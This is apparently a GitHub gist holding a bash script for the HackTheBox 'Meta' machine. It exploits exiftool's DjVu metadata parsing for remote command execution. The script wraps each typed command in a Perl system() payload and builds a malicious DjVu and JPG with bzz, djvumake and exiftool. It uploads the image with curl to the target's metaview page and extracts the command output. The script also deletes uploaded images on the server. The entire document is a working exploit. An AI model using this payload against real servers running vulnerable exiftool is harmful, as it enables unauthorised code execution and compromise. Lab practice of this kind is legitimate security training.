@xl00t
Last active May 8, 2022 15:52
meta.htb exiftool RCE
#!/usr/bin/env bash
while true; do
read -p "> " userinput
if [[ "$userinput" =~ "exit" ]]; then exit; fi
payload="(metadata \"\\c\${system('rm uploads/*.jpg;echo dfff0a70fa1a55c8c1a4966c19f6da452 ; $userinput ; echo dfff0a70fa1a55c8c1a4966c19f6da452')};\")"
echo $payload > payload
bzz payload payload.bzz
djvumake exploit.djvu INFO='1,1' BGjp=/dev/null ANTz=payload.bzz
exiftool -config configfile '-HasselbladExif<=exploit.djvu' hacker.jpg 1> /dev/null
curl http://dev01.artcorp.htb/metaview/index.php -F "imageUpload=@hacker.jpg" 2> /dev/null | sed -n -e '/dfff0a70fa1a55c8c1a4966c19f6da452/,/dfff0a70fa1a55c8c1a4966c19f6da452/ p' | sed 's/dfff0a70fa1a55c8c1a4966c19f6da452//' | sed 's/<pre>//' | sed '/^[[:space:]]*$/d'
done